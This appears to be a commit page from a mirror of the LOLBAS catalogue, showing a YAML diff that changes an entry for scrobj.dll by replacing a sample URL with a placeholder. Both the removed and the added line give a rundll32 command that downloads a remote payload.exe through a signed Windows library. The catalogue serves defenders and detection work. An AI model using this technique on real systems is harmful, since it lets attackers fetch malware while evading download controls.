public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-29 05:31:53 +02:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSLibraries/Scrobj.yml
View File

@@ -4,8 +4,8 @@ Description: Windows Script Component Runtime
Author: Eral4m
Created: 2021-01-07
Commands:
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}
Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.
Usecase: Download file from remote location.
Category: Download
Privileges: User